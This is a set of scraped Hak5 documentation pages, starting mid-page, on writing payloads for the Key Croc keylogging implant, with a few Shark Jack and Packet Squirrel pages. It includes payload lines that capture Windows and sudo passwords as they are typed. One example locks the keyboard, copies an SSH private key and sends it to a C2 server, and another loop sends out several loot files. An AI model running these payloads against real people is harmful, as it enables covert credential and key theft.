`MATCH hello SAVEKEYS /root/loot/test.log NEXT 6`
Imagine the target were to type “hello world”. These 11 keys (the 10 characters and 1 spacebar key press) would be saved to the keylog files. As soon as the 5th key was pressed, completing the string “hello”, the above example payload would execute based on the first line `MATCH` statement. The second line of the payload would then instruct the framework to save the next 6 keypresses to a test.log file in `/root/loot/`.
In this case when the target types “hello world” the payload executes, creating a new file in `/root/loot/test.log` containing " world".
SAVEKEYS UNTIL [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#savekeys-until)
--------------------------------------------------------------------------------------------------------------
In addition to saving a specified number of keys to save with the `NEXT` parameter, `SAVKEYS` also features a `UNTIL` function (added in 1.3) which will save up to 255 keys `UNTIL` the specified key (regex value) is pressed.
`MATCH \[CONTROL-ALT-DELETE\] SAVEKEYS /root/loot/windows-pass.txt UNTIL \[ENTER\]`
In this example, the payload begins recording keystrokes to the `pass.txt` file when the `CONTROL-ALT-DELETE` keyboard combination is pressed, and continues to record until the `ENTER` key is pressed.
Note the escape characters before `[` and `]` in these regular expressions.
`MATCH sudo(.*?)\[ENTER\] SAVEKEYS /root/loot/sudo-pass.txt UNTIL \[ENTER\]`
SAVEKEYS LAST [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#savekeys-last)
------------------------------------------------------------------------------------------------------------
In addition to saving the next keys typed after a `MATCH`, the `SAVEKEYS` command may be used to save the `LAST` keys typed before a `MATCH`.
To recycle our `SAVEKEYS NEXT` example above, we could modify with the following:
`MATCH world SAVEKEYS /root/loot/test.log LAST 7`
In this case when the target types “hello world” the payload gets executed on the 11th keypress, when the `MATCH` “world” were completed, and the previously typed 7 keys would be saved to the `/root/loot/test.log` file. This would result in a log file containing “hello “.
Additional `SAVEKEYS` Considerations [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#additional-savekeys-considerations)
-----------------------------------------------------------------------------------------------------------------------------------------------------------
A maximum of 128 keys may be stored with `SAVEKEYS` either `NEXT` or `LAST`.
`SAVEKEYS` requires an absolute path for the output file. It cannot take a variable.
* `SAVEKEYS /tmp/keys.txt LAST 10` – correct usage
* `SAVEKEYS $keyfile LAST 10` – incorrect usage
If `SAVEKEYS` is to be used in a payload, it must immediately follow a `MATCH` command.
### Correct `SAVEKEYS` usage [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#correct-savekeys-usage)
`MATCH hello SAVEKEYS /root/loot/text.log NEXT 6 LED ATTACK`
### Incorrect `SAVEKEYS` usage [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-savekeys-command/#incorrect-savekeys-usage)
`MATCH hello LED ATTACK SAVEKEYS /root/loot/test.log NEXT 6`
Keys of interest saved with `SAVEKEYS` may be extracted systematically using text processing tools and used later as variables in a payload. It is important to note a payload will need to wait until the keys are saved – so pay special attention to the while command. For example:
`MATCH \[CTRL-ALT-DELETE] SAVEKEYS /tmp/login NEXT 30 while [ ! -f /tmp/login ]; do sleep 2; done CREDS=$(cat /tmp/login | sed 's/\[TAB\]//g' | awk -F'\[ENTER\]' '{print $1}')`
Similar to `MATCH`, one should consider that `SAVEKEYS` is not actually a bash command but rather a Key Croc command which is interpreted by the Payload Framework. Changes to the `SAVEKEYS` command requires a reboot or issuing the `RELOAD_PAYLOADS` command. Additionally, the `CHECK_PAYLOADS` command will check the syntax and display the payload which will execute after the corresponding `MATCH` is typed by the target.
report
Do not use the word “`SAVEKEYS`” in a payload’s comment as doing so will cause interpretation issues with the Key Croc payload parser.
* * *
[_navigate\_before_ The MATCH Command](https://docs.hak5.org/key-croc/writing-payloads/the-match-command/)
[The QUACK Command _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/)
---
# The LED Command | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
The LED Command
===============
The Key Croc features a multi-color LED which is controlled using the LED Command. This may be useful in payloads for debugging or other specialized purposes. Otherwise, considering the covert nature of the device the LED is typically off.
LED COLORS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/#led-colors)
-------------------------------------------------------------------------------------------------
| COMMAND | Description |
| --- | --- |
| R | Red |
| G | Green |
| B | Blue |
| Y | Yellow (AKA as Amber) |
| C | Cyan (AKA Light Blue) |
| M | Magenta (AKA Violet or Purple) |
| W | White |
warning
While the LED may be manually set to any of the above colors, it is highly recommend that payloads conform to one of the LED States listed below.
LED PATTERNS [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/#led-patterns)
-----------------------------------------------------------------------------------------------------
| PATTERN | Description |
| --- | --- |
| SOLID | _Default_ No blink. Used if pattern argument is ommitted |
| SLOW | Symmetric 1000ms ON, 1000ms OFF, repeating |
| FAST | Symmetric 100ms ON, 100ms OFF, repeating |
| VERYFAST | Symmetric 10ms ON, 10ms OFF, repeating |
| SINGLE | 1 100ms blink(s) ON followed by 1 second OFF, repeating |
| DOUBLE | 2 100ms blink(s) ON followed by 1 second OFF, repeating |
| TRIPLE | 3 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUAD | 4 100ms blink(s) ON followed by 1 second OFF, repeating |
| QUIN | 5 100ms blink(s) ON followed by 1 second OFF, repeating |
| ISINGLE | 1 100ms blink(s) OFF followed by 1 second ON, repeating |
| IDOUBLE | 2 100ms blink(s) OFF followed by 1 second ON, repeating |
| ITRIPLE | 3 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUAD | 4 100ms blink(s) OFF followed by 1 second ON, repeating |
| IQUIN | 5 100ms blink(s) OFF followed by 1 second ON, repeating |
| SUCCESS | 1000ms VERYFAST blink followed by SOLID |
| 1-10000 | Custom value in ms for continuous symmetric blinking |
### [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/#x20)
LED STATE [_link_](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/#led-state)
-----------------------------------------------------------------------------------------------
These standardized LED States may be used to indicate common payload status. The basic LED states include `SETUP`, `FAIL`, `ATTACK`, `CLEANUP` and `FINISH`. Payload developers are encouraged to use these common payload states. Additional states including multi-staged attack patterns are shown in the table below.
| STATE | COLOR PATTERN | Description |
| --- | --- | --- |
| SETUP | M SOLID | Magenta solid |
| FAIL | R SLOW | Red slow blink |
| FAIL1 | R SLOW | Red slow blink |
| FAIL2 | R FAST | Red fast blink |
| FAIL3 | R VERYFAST | Red very fast blink |
| ATTACK | Y SINGLE | Yellow single blink |
| STAGE1 | Y SINGLE | Yellow single blink |
| STAGE2 | Y DOUBLE | Yellow double blink |
| STAGE3 | Y TRIPLE | Yellow triple blink |
| STAGE4 | Y QUAD | Yellow quadruple blink |
| STAGE5 | Y QUIN | Yellow quintuple blink |
| SPECIAL | C ISINGLE | Cyan inverted single blink |
| SPECIAL1 | C ISINGLE | Cyan inverted single blink |
| SPECIAL2 | C IDOUBLE | Cyan inverted double blink |
| SPECIAL3 | C ITRIPLE | Cyan inverted triple blink |
| SPECIAL4 | C IQUAD | Cyan inverted quadriple blink |
| SPECIAL5 | C IQUIN | Cyan inverted quintuple blink |
| CLEANUP | W FAST | White fast blink |
| FINISH | G SUCCESS | Green 1000ms VERYFAST blink followed by SOLID |
* * *
[_navigate\_before_ Advanced Quack Commands](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/)
[Files And Directory Structure _navigate\_next_](https://docs.hak5.org/key-croc/files-and-directory-structure/files-and-directory-structure/)
---
# Firmware Recovery | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Firmware Recovery
=================
Holding the push button for 3-7 seconds while powering on the device in the arming mode will enable access to the firmware recovery web console. From this mode you can browse to the recovery console at [http://192.168.1.1](http://192.168.1.1/)
from a computer connected to the Ethernet In port.
In some cases where an IP address is not obtained from the Packet Squirrel’s DHCP server, a static IP address must be set within the 192.168.1.x range in order to access the firmware recovery web console.
Download the [squirrel-recovery.bin](https://downloads.hak5.org/api/devices/packetsquirrel/firmwares/recovery)
factory recovery image from the [Hak5 Download Center](https://downloads.hak5.org/)
.\\
* * *
[_navigate\_before_ Included Tools](https://docs.hak5.org/packet-squirrel/payload-development/included-tools/)
[Factory Reset _navigate\_next_](https://docs.hak5.org/packet-squirrel/troubleshooting/factory-reset/)
---
# Getting The Key Croc Online | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Getting The Key Croc Online
===========================
The Key Croc features an onboard WiFi module for connecting to nearby 2.4GHz networks. To configure WiFi, edit the `config.txt` file on the root of the Key Croc flash disk from Arming Mode.
The two WiFi parameters are:
* `WIFI_SSID` – the network name\\
* `WIFI_PASS` – the WPA-PSK password
Any characters after these key words will be used as the values.
Protected Network [_link_](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/#protected-network)
--------------------------------------------------------------------------------------------------------------------------
Example:
`WIFI_SSID MyTargetNetwork WIFI_PASS I'm not telling you.`
warning
**Some** special characters interpreted by bash may need to be escaped.
Open Networks [_link_](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/#open-networks)
------------------------------------------------------------------------------------------------------------------
info
For **open networks** which do not require a password, **omit** the `WIFI_PASS` option.
Resetting Wireless Configuration [_link_](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/#resetting-wireless-configuration)
--------------------------------------------------------------------------------------------------------------------------------------------------------
report
To **disconnect** the Key Croc from a network, **remove** the `WIFI_SSID` and `WIFI_PASS` options, then restart the device.
Overriding DNS [_link_](https://docs.hak5.org/key-croc/beginner-guides/getting-the-key-croc-online/#overriding-dns)
--------------------------------------------------------------------------------------------------------------------
By default the Key Croc is configured to attempt to obtain an IP address from a network’s DHCP server. Configuring a static IP address is outside the scope of this guide, however considering its Debian base this can be achieved in a number of ways.
The DNS server may be overridden from that obtained via DHCP by using the DNS option in `config.txt`, in the format:
`DNS x.x.x.x x.x.x.x`
To determine the IP address obtained by the Key Croc for development purposes, see the guide on Interactive Payload Development from the Tips section of this documentation.
* * *
[_navigate\_before_ Factory Reset](https://docs.hak5.org/key-croc/basics/factory-reset/)
[New Features In Key Croc 1.3 _navigate\_next_](https://docs.hak5.org/key-croc/beginner-guides/new-features-in-key-croc-1.3/)
---
# Advanced Quack Commands | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Advanced Quack Commands
=======================
QUACK KEYCODE [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-keycode)
---------------------------------------------------------------------------------------------------------------
`KEYCODE` will inject an arbitrary keystroke from a three byte scan code. This may be useful when used in conjunction with `HOLD`, for language agnostics payloads, or when testing multimedia and other extended key functions not explicitly defined in the language file.
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#example)
`QUACK KEYCODE 00,00,56`
QUACK ALTCODE [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-altcode)
---------------------------------------------------------------------------------------------------------------
`ALTCODE` allows the printing of alt-codes on Windows systems only.
### **EXAMPLES** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#examples)
`QUACK ALTCODE 168`
`QUACK ALTCODE 236`
QUACK HOLD AND RELEASE [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-hold-and-release)
---------------------------------------------------------------------------------------------------------------------------------
`HOLD` will hold the specified key until `QUACK RELEASE` is issued. `HOLD` accepts either a `KEYCODE` or a `STRING`.
### **EXAMPLE** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#example-1)
`QUACK STRING G QUACK HOLD STRING o QUACK DELAY 1000 QUACK RELEASE QUACK STRING d morning!`
`QUACK HOLD KEYCODE 00,00,52 QUACK DELAY 1000 QUACK RELEASE`
### **TECHNICAL DETAIL** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#x20technical-detail)
Each target interprets held keys differently. When holding the spacebar on your keyboard, the keyboard is not sending a multitude of spacebar scan codes – rather a single hold and release. As you watch your cursor cross the screen, the rate is determined by the operating system.
QUACK LOCK AND UNLOCK [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-lock-and-unlock)
-------------------------------------------------------------------------------------------------------------------------------
`LOCK` will prevent the attached keyboard from passing through keystrokes to the target. This may be useful in payloads which need to temporarily lock out the user while a sensitive keystroke injection attack is occuring. Keys pressed on the attached keyboard are not buffered while using `LOCK` and will not be typed once unlocked.
`UNLOCK` will allow the attached keyboard to pass through keystrokes to the target once more after the `QUACK LOCK` command is issued.
BASH CONSIDERATIONS FOR QUACK STRING [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#bash-considerations-for-quack-string)
-------------------------------------------------------------------------------------------------------------------------------------------------------------
The `QUACK STRING` command accepts strings interpreted by bash. Consider these key elements when using `QUACK STRING`.
### **QUACK STRING WITH QUOTES** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-string-with-quotes)
When using special characters, such as the apostrophe in the example below, wrap the string with quotes – otherwise bash will be expecting a second apostrophe to complete the quote, and the interpretation will not be what you expect.
`QUACK STRING "Isn't this a cool string"`
### **QUACK STRING AND ESCAPING SPECIAL CHARACTERS** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-string-and-escaping-special-characters)
Alternatively, special characters may be escaped rather than wrapping the string in quotes.
`QUACK STRING Isn\'t this a cool string`
### **QUACK STRING WITH COMMAND SUBSTITUTION** [_link_](https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands/#quack-string-with-command-substitution)
Since `QUACK STRING` is interpreted by bash, command substitution may be used. In this example, the Key Croc will inject the keystrokes containing the output of the ifconfig command.
`QUACK STRING "$(ifconfig usb0 | grep 'inet addr')"`
Compare this to the following, without the `$()` command substitution directive, which actually injects the keystrokes of the command in question.
`QUACK STRING "ifconfig usb0 | grep 'inet addr'"`
* * *
[_navigate\_before_ The QUACK Command](https://docs.hak5.org/key-croc/writing-payloads/the-quack-command/)
[The LED Command _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-led-command/)
---
# Understanding The File System | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Understanding The File System
=============================
Out of the box the emulated “USB Flash Disk” (udisk) feature of the Key Croc is handled automatically. Special care is taken for loot and payload synchronization between the primary partition and the udisk on boot and when entering arming mode. However, if you will be writing advanced payloads which take advantage of the `ATTACKMODE STORAGE` option, it is important to have a good understanding of the udisk partition and its handling so that file system corruption does not occur.
The Key Croc features an 8 GB SSD containing many partitions. Most notably among them is a 2 GB FAT32 formatted partition mounted at `/root/udisk`. It is referred to as the USB Flash Disk partition, or simply udisk.
For the sake of simplicity in this guide, we will refer to this partition as the udisk. Likewise, the Key Croc itself is considered the host while the computer that the Key Croc is plugged into is considered the target.
The udisk can either be attached to the host (again, the Key Croc itself) or the target (again, the computer to which the Key Croc is connected). The udisk should not be simultaneously attached to both. This means that if the target can see the “KeyCroc” udisk, then the host should not read or write to this partition in its usual `/root/udisk` location.
UDISK IN ARMING MODE [_link_](https://docs.hak5.org/key-croc/files-and-directory-structure/understanding-the-file-system/#udisk-in-arming-mode)
------------------------------------------------------------------------------------------------------------------------------------------------
When the Key Croc enters arming mode two functions are performed. First, the loot collected in /root/loot will be synchronized with the loot directory on the udisk. Second, the udisk will be attached to the target with the drive label “KeyCroc”.
From the drive labeled “KeyCroc” on the target, payloads may be activated by copying them to the payloads directory. Likewise, keystroke logs may be copied from the loot directory.
It is important to “safely eject” the udisk before unplugging the Key Croc from the target.
UDISK IN ATTACK MODE [_link_](https://docs.hak5.org/key-croc/files-and-directory-structure/understanding-the-file-system/#udisk-in-attack-mode)
------------------------------------------------------------------------------------------------------------------------------------------------
When the Key Croc boots, it enters Attack Mode by default. In this mode, the udisk is attached to the host. When the Key Croc starts up, payloads are copied from the udisk’s payload directory to a cache on the primary partition. Do not live edit these files in attack mode, either by Cloud C2 terminal or SSH. Doing so may cause unexpected results as they relate to `MATCH` handling. See the section on Interactive Payload Development for further information on that use case.
The udisk partition is formatted in the FAT32 file system for maximum compatibility with various targets (Windows, Mac, Linux, etc) and as such does not allow for some features typically found on Linux filesystems like EXT – for example symlinks.
UDISK IN PAYLOADS [_link_](https://docs.hak5.org/key-croc/files-and-directory-structure/understanding-the-file-system/#udisk-in-payloads)
------------------------------------------------------------------------------------------------------------------------------------------
The best practice in terms of saving loot from your payload is to write the file to `/root/loot`. This directory is synchronized with the udisk when entering Arming Mode.
If a payload is to use the `ATTACKMODE STORAGE` option – which exposes the udisk to the target – special care should be taken as not to inadvertently read or write to the udisk from the host, either from an activated payload or interactively from a SSH connection or Cloud C2 terminal. To handle this, the udisk command provides options for mounting and unmounting the partition to ensure that this cannot occur.
For example, a payload which uses the udisk for exfiltration may perform the following:
`# # MATCH cp QUACK LOCK udisk unmount ATTACKMODE HID STORAGE QUACK STRING "cp ~/.ssh/id_rsa /Volumes/KeyCroc/loot/ QUACK ENTER ATTACKMODE HID udisk mount QUACK UNLOCK C2EXFIL STRING /root/udisk/loot/id_rsa My-Simple-Payload`
Now obviously this is only for demonstration purposes, and this payload would likely need some delays to actually work. It’s also highly obvious and will probably end your pentest very quickly, but it still illustrates the point.
* * *
[_navigate\_before_ Files And Directory Structure](https://docs.hak5.org/key-croc/files-and-directory-structure/files-and-directory-structure/)
[Installing Extras Like Metasploit _navigate\_next_](https://docs.hak5.org/key-croc/tips-and-tricks/installing-extras-like-metasploit/)
---
# Default Settings | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Default Settings
================
DEFAULT SETTINGS [_link_](https://docs.hak5.org/shark-jack/getting-started/default-settings/#default-settings)
---------------------------------------------------------------------------------------------------------------
The default settings for the Shark Jack are:
* Username: `root`
* Password: `hak5shark`
* Arming Mode IP Address: `172.16.24.1`
DIRECTORY STRUCTURE [_link_](https://docs.hak5.org/shark-jack/getting-started/default-settings/#directory-structure)
---------------------------------------------------------------------------------------------------------------------
| PATH | Contents |
| --- | --- |
| `/root/loot/` | log files and other loot stored by payloads |
| `/root/payload/` | the payload which will execute when the switch is in Attack mode |
| `/root/payload/library` | payload library, populated by the `UPDATE_PAYLOADS` command ¹ |
¹ command available on the Shark Jack Cable and any Shark Jack with firmware 1.2.0 and above.
LED STATUS INDICATIONS [_link_](https://docs.hak5.org/shark-jack/getting-started/default-settings/#led-status-indications)
---------------------------------------------------------------------------------------------------------------------------
| LED | Status |
| --- | --- |
| Green (blinking) | Booting up |
| Blue (blinking) | Charging |
| Blue (solid) | Fully Charged |
| Yellow (blinking) | Arming Mode |
| Red (blinking) | Error - no payload found |
SHARK JACK HELPERS AND COMMANDS [_link_](https://docs.hak5.org/shark-jack/getting-started/default-settings/#shark-jack-helpers-and-commands)
---------------------------------------------------------------------------------------------------------------------------------------------
info
These commands are intended for use with the Shark Jack Cable when connected via Serial in Arming Mode and may be used by any Shark Jack with firmware 1.2.0 and above.
| COMMAND | Description |
| --- | --- |
| HELP | List Shark Jack helpers and commands |
| ACTIVATE | Activate a payload |
| ACTIVATE\_PAYLOAD | Alias for ACTIVATE |
| LIST | List the local payload library |
| LIST\_PAYLOADS | Alias for LIST |
| UPDATE\_PAYLOADS | Synchronize local payload library with remote library |
| UPDATE\_FIRMWARE | Check for and install available firmware updates |
| SERIAL\_WRITE | Write to the serial console |
| LED | Configure the LED |
SHARK JACK SERIAL SETTINGS [_link_](https://docs.hak5.org/shark-jack/getting-started/default-settings/#shark-jack-serial-settings)
-----------------------------------------------------------------------------------------------------------------------------------
* flow control: none
* baud rate: 57600
* parity: none
* databits: 8
* stop bit: 1
info
Serial Settings apply only to Shark Jack Cable
* * *
[_navigate\_before_ Shark Jack Basics](https://docs.hak5.org/shark-jack/getting-started/shark-jack-basics/)
[Unboxing And Setup _navigate\_next_](https://docs.hak5.org/shark-jack/beginner-guides/unboxing-and-setup/)
---
# Writing A Simple Payload | Hak5 - Shark Jack
[](https://docs.hak5.org/shark-jack/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Writing A Simple Payload
========================
One of the simplest but most useful payloads you can rock on a [Shark Jack](https://shop.hak5.org/products/shark-jack)
is a simple port tester. With it you can tell at a glance from the multi-color LED whether a port is active, if it gets an IP address, and whether it has a connection to the Internet. In this article we’ll write this basic yet powerful payload.

}}
If you’ve worked in IT for a while you’ve come across this conundrum. Is this thing on? Without breaking out ye-olde-laptop, we’re going to use the Shark Jack to test just this. Let’s see how 5 simple lines of bash will give us instant feedback from the RGB LED.
Let’s start out payload with the LED command. Even without perusing the official Shark Jack documentation you’ll pick up how this command works just by example.
> `LED R SOLID`
It pretty much writes itself. It’s an RGB LED, and go figure the R parameter to the LED command tells it to light up Red. The second parameter, solid, said, huh, not to blink. The alternative would be SLOW, FAST or VERYFAST depending on how rapidly you’d want the LED to blink.
So in this state, the first thing the Shark Jack is going to do is make its LED red. Meanwhile, the framework is going to attempt to obtain an IP address from the target LAN via DHCP. What we’ll want to do next is check to see if that’s been successful – and if it has we’ll change color. Otherwise, this Shark’s staying red, and it’ll be quite apparent when using that the port is a no-go.
> `while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done`
This little bash one-liner continuously checks the eth0 interface for the existence of the line “inet addr” – which is what you’ll get when running the “ifconfig” command when your interface has an IP address. If it doesn’t return any results, it’ll “do” the command between “do” and “done”, forever. That command? Sleep for one second, before checking again. The trick to this command is the exclamation point before the command – that’s the magic that says “do this (sleep for a second) if it IS NOT true”. Once the statement IS true (the grep for “inet addr” returns something), the command will be passed and our next command will run. Which in this case, will be:
> `LED Y SOLID`
You can see where this is going. Once the Shark Jack gets an IP address, it’s going to light – you guessed it – yellow. Our next command will use the same while loop logic as before to block the script from continuing – in this case until its able to download an HTTP web page.
> `while ! wget http://example.com -qO /dev/null; do sleep 1; done`
I love example.com – don’t you? It’s always there for us. In this case, just as before, the script won’t continue until it’s able to complete this action. You can replace example.com with any HTTP site of your choosing – I just prefer to use the site that was reserved by the Internet Engineering Task Force back in 1999.
And finally, the command that has me quoting Dr. Raymond Stantz (played by Dan Aykroyd in 1984):
> `LED G SOLID`
It may not be an Ecto-Containment System, but this payload will quickly answer the age old question – is this thing on?
`#!/bin/bash # # # obtain an IP address from DHCP, and if it can access the Internet by # testing a specified HTTP URL. # # LED SETUP (Magenta)... Setting NETMODE to DHCP_CLIENT # LED Red... No IP address from DHCP yet # LED Yellow... Obtained IP address from DHCP, waiting on Internet access # LED Green... Confirmed access to Internet PUBLIC_TEST_URL="http://www.example.com" LED SETUP # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT LED R SOLID while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done LED Y SOLID while ! wget $PUBLIC_TEST_URL -qO /dev/null; do sleep 1; done LED G SOLID`
And that’s it. Find a [prettied-up version](https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/util/internet-access-tester/payload.sh)
ready to go. Love it? Chat with us on the [forums](https://forums.hak5.org/forum/101-shark-jack/)
. Want more for your Shark Jack? Nab some other sweet [payloads](https://payloads.hak5.org/)
. Cheers!
* * *
[_navigate\_before_ Two Key Commands](https://docs.hak5.org/shark-jack/beginner-guides/two-key-commands/)
[Manual Upgrade _navigate\_next_](https://docs.hak5.org/shark-jack/software-updates/manual-upgrade/)
---
# Installing Extras Like Metasploit | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installing Extras Like Metasploit
=================================
With the power of a full Debian Linux box under the hood, the Key Croc is far more capable than simply recording and streaming keystrokes or executing pattern matched payloads.
Either in conjunction with, or in addition to payloads – additional tools may be used to fully exploit the target. Some, such as smbclient and nmap, come pre-installed. Others require some setup. The `INSTALL_EXTRAS` command will aid in the installation of some useful packages like Metasploit, Impacket and Responder.
report
Third party software is provided “AS IS” without any warranty. Third party license terms apply. Hak5 LLC makes no claim to third party software. User is solely responsible for determining the appropriateness of using third party software and assumes any risk associated.
The `INSTALL_EXTRAS` command may be executed from SSH, Cloud C2 Terminal or Serial and requires the Key Croc to be online. Installation may take several minutes to complete. When done, these additional tools will be located in the `/tools/` directory.
* * *
[_navigate\_before_ Understanding The File System](https://docs.hak5.org/key-croc/files-and-directory-structure/understanding-the-file-system/)
[USB Identifiers _navigate\_next_](https://docs.hak5.org/key-croc/writing-payloads/the-attackmode-command/usb-identifiers/)
---
# Helpful Payload Snippets | Hak5 - Key Croc
[](https://docs.hak5.org/key-croc/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Helpful Payload Snippets
========================
EXFILTRATE MULTIPLE FILES USING C2EXFIL [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/#exfiltrate-multiple-files-using-c2exfil)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
The `C2EXFIL` tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory.
`FILES="$LOOT_DIR/*.txt" for f in $FILES; do C2EXFIL STRING $f Example; done`
ADD AN ATTACKMODE WITH THE CLONED VID AND PID VALUES [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/#add-an-attackmode-with-the-cloned-vid-and-pid-values)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
By default the Key Croc boots into Attack Mode and clones the `VID` and `PID` values of the connected human interface device (HID Keyboard).
The `VID` and `PID` values are stored in the /tmp/vidpid directory and may be referenced in a payload using the following:
`VENDOR=$(cat /tmp/vidpid | cut -d: -f1) PRODUCT=$(cat /tmp/vidpid | cut -d: -f2) ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT`
CHECKING CURRENT MODE (ATTACK OR ARMING) [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/#checking-current-mode-attack-or-arming)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
If the Key Croc is in the Attack Mode, rather than Arming Mode, the `/tmp/attackmode` file will exist.
Checking the current `ATTACKMODE`
The Key Croc stores its current `ATTACKMODE` in the file `/tmp/mode`. In addition to the `ATTACKMODE` options like `HID` or `SERIAL`, the /tmp/mode file reports all additional parameters such as `VID` and `PID`. These values may be passed to a new `ATTACKMODE` command using the bash command substitution feature. In this example, the output of “`cat /tmp/mode`”, inside of the `$()` directive, is substituted.
`root@croc:~# cat /tmp/mode HID VID_0X04B3 PID_0X3025 root@croc:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode) TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1 root@croc:~#`
GETTING THE TARGET HOSTNAME AND IP ADDRESS [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/#getting-the-target-hostname-and-ip-address)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
While the `ECM_ETHERNET` and `RNDIS_ETHERNET` options for `ATTACKMODE` will display the Target IP address and hostname interactively, these values may also be used in a payload. To store these values in a variable, use the following:
`GET_VARS $TARGET_IP $TARGET_HOSTNAME $HOST_IP`
Alternatively, these target values may be obtained from the following:
`TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')`
And the host IP (the IP address of the Key Croc itself) can be determined with the following:
`HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})`
However, unless changed from its default this value will be 172.16.64.1.
FRAMEWORK HELPERS [_link_](https://docs.hak5.org/key-croc/tips-and-tricks/helpful-payload-snippets/#framework-helpers)
-----------------------------------------------------------------------------------------------------------------------
From firmware 1.3+, many functions of the Key Croc may be exposed by sourcing the croc\_framework. The `GET_HELPERS` command provides an outline of their functions:
`root@croc:~/loot# GET_HELPERS Available helper functions provided by sourcing croc_framework MOUNT_UDISK Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot UNMOUNT_UDISK Safely Unmounts udisk UPDATE_LANGUAGES Copy language files from udisk to the croc ENABLE_INTERFACE Enables wlan0 CLEAR_WIFI_CONFIG Remove wpa_supplicant.conf to clear current wireless configuration CONFIG_OPEN_WIFI Generate a wpa_supplicant.conf for open wifi Example: CONFIG_OPEN_WIFI 'attwifi' CONFIG_PSK_WIFI Generate a wpa_supplicant.conf for psk wifi Example: CONFIG_PSK_WIFI 'attwifi' 'password' START_WLAN_DHCP Start dhcp on wlan0 ENABLE_WIFI Enable wifi helper configures wpa_supplicant, indicates using LED, enables interface, starts wpa_supplicant and dhcp Example psk: ENABLE_WIFI 'attwifi' 'password' Example open: ENABLE_WIFI 'attwifi' DISABLE_SSH Disable SSH service ENABLE_SSH Enable SSH service`
* * *
[_navigate\_before_ Interactive Payload Development](https://docs.hak5.org/key-croc/tips-and-tricks/interactive-payload-development/)
---
